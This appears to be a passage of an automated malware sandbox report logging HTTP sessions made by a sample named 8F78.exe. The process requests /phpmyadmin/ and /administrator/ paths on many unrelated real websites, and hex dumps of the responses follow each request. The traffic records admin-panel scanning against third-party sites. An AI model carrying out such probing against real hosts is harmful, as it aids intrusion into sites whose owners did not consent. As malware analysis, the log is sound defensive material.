                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC258INData Raw: 66 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 72 65 64 61 6a 70 61 6c 69 65 74 2e 73 6b 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d
                                                                                                                                                                                                                                                                                                                                Data Ascii: f7<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.predajpaliet.sk/phpmyadmin/">here</a>.</p></body></html>0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                81192.168.2.45447166.97.32.254435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC171OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: emr.com.ar
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC735INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:59 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.3.22
                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=c48e7453994f0e47ba9488c5805917f9; path=/
                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Set-Cookie: lang=1; expires=Sat, 20-Jan-2024 04:04:59 GMT; Max-Age=2592000; path=/
                                                                                                                                                                                                                                                                                                                                Set-Cookie: pop_lumen=1; expires=Sat, 20-Jan-2024 04:04:59 GMT; Max-Age=2592000; path=/
                                                                                                                                                                                                                                                                                                                                Set-Cookie: country=%7B%22countryCode%22%3A%22AR%22%2C%22country%22%3A%22Argentina%22%7D; expires=Sat, 20-Jan-2024 04:04:59 GMT; Max-Age=2592000; path=/
                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC6INData Raw: 31 35 39 33 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 1593
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC5523INData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 3e 0a 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 44 65 73 63 75 62 72 69 6e 6f 73 20 79 20 65 6e 63 6f
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge" ><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" ><meta name="description" content="Descubrinos y enco
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                82192.168.2.45451346.229.230.404435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC175OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: elektrospol.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC245INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: https://www.elektrospol.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Length: 246
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC246INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 65 6c 65 6b 74 72 6f 73 70 6f 6c 2e 73 6b 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.elektrospol.sk/phpmyadmin/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                83192.168.2.45465789.46.109.484435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC170OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: predan.it
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC249INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: aruba-proxy
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: https://www.predan.it/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                X-ServerName: ipvsproxy189.ad.aruba.it
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC179INData Raw: 61 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 61 72 75 62 61 2d 70 72 6f 78 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: a8<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>aruba-proxy</center></body></html>0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                84192.168.2.45466189.46.109.484435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC170OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: predan.it
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC249INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: aruba-proxy
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: https://www.predan.it/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                X-ServerName: ipvsproxy189.ad.aruba.it
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC179INData Raw: 61 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 61 72 75 62 61 2d 70 72 6f 78 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: a8<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>aruba-proxy</center></body></html>0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                85192.168.2.45467089.46.109.484435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC170OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: predan.it
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC249INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: aruba-proxy
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: https://www.predan.it/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                X-ServerName: ipvsproxy189.ad.aruba.it
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC179INData Raw: 61 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 61 72 75 62 61 2d 70 72 6f 78 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: a8<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>aruba-proxy</center></body></html>0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                86192.168.2.45466489.46.109.484435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC170OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: predan.it
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC249INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: aruba-proxy
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: https://www.predan.it/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                X-ServerName: ipvsproxy189.ad.aruba.it
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC179INData Raw: 61 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 61 72 75 62 61 2d 70 72 6f 78 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: a8<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>aruba-proxy</center></body></html>0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                87192.168.2.45466789.46.109.484435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC170OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: predan.it
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC249INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: aruba-proxy
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: https://www.predan.it/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                X-ServerName: ipvsproxy189.ad.aruba.it
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:29 UTC179INData Raw: 61 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 61 72 75 62 61 2d 70 72 6f 78 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: a8<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>aruba-proxy</center></body></html>0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                88192.168.2.45479492.240.253.34435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: eurokamen.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC320INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                link: <https://eurokamen.sk/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                x-bver: v2
                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC14158INData Raw: 33 37 34 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 73 6b 2d 53 4b 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 74 72 c3 a1 6e 6b 61 20 6e 65 6e c3 a1 6a 64 65 6e c3 a1 20 26 23 38 32 31 31 3b 20 45 55 52 4f 20 4b 41 4d 45 c5 87 2c 20 73 2e 72 2e 6f 2e 3c
                                                                                                                                                                                                                                                                                                                                Data Ascii: 3746<!DOCTYPE html><html lang="sk-SK"><head><meta charset='UTF-8'><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Strnka nenjden &#8211; EURO KAME, s.r.o.<
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC16384INData Raw: 34 33 45 30 0d 0a 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 73 6d 61 6c 6c 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6d 65 64 69 75 6d 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d
                                                                                                                                                                                                                                                                                                                                Data Ascii: 43E0ckground{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC1000INData Raw: 79 2d 6d 69 67 72 61 74 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 34 2e 31 22 20 69 64 3d 22 6a 71 75 65 72 79 2d 6d 69 67 72 61 74 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 6e 6f 74 69 63 65 2d 66 72 6f 6e 74 2d 6a 73 2d 62 65 66 6f 72 65 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 63 6e 41 72 67 73 20 3d 20 7b 22 61 6a 61 78 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 65 75 72 6f 6b 61 6d 65 6e 2e 73 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 2c 22 6e 6f 6e 63 65 22 3a 22 34 37 31 61 66 63 35 63 37 65 22 2c 22 68 69 64 65 45 66 66 65
                                                                                                                                                                                                                                                                                                                                Data Ascii: y-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script><script async type="text/javascript" id="cookie-notice-front-js-before">/* <![CDATA[ */var cnArgs = {"ajaxUrl":"https:\/\/eurokamen.sk\/wp-admin\/admin-ajax.php","nonce":"471afc5c7e","hideEffe
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC13165INData Raw: 33 33 36 30 0d 0a 22 63 61 70 74 69 6f 6e 44 65 73 63 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 5d 20 7d 2c 20 65 78 63 6c 75 64 65 73 3a 27 2e 66 62 78 2d 6c 69 6e 6b 2c 2e 6e 6f 66 6f 6f 62 6f 78 2c 2e 6e 6f 6c 69 67 68 74 62 6f 78 2c 61 5b 68 72 65 66 2a 3d 22 70 69 6e 74 65 72 65 73 74 2e 63 6f 6d 2f 70 69 6e 2f 63 72 65 61 74 65 2f 62 75 74 74 6f 6e 2f 22 5d 27 2c 20 61 66 66 69 6c 69 61 74 65 20 3a 20 7b 20 65 6e 61 62 6c 65 64 3a 20 66 61 6c 73 65 20 7d 2c 20 65 72 72 6f 72 3a 20 22 50 6f 6c 6f c5 be 6b 75 20 73 61 20 6e 65 70 6f 64 61 72 69 6c 6f 20 6e 61 c4 8d c3 ad 74 61 c5 a5 22 7d 2c 0d 0a 09 73 65 6c 65 63 74 6f 72 73 3a 20 5b 0d 0a 09 09 22 2e 66 6f 6f 67 61 6c 6c 65 72 79 2d 63 6f 6e 74 61 69 6e 65 72 2e 66 6f 6f 67 61 6c 6c 65 72 79 2d
                                                                                                                                                                                                                                                                                                                                Data Ascii: 3360"captionDesc","description"] }, excludes:'.fbx-link,.nofoobox,.nolightbox,a[href*="pinterest.com/pin/create/button/"]', affiliate : { enabled: false }, error: "Poloku sa nepodarilo nata"},selectors: [".foogallery-container.foogallery-


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                89192.168.2.454759178.238.43.2104435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: sport-tour.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
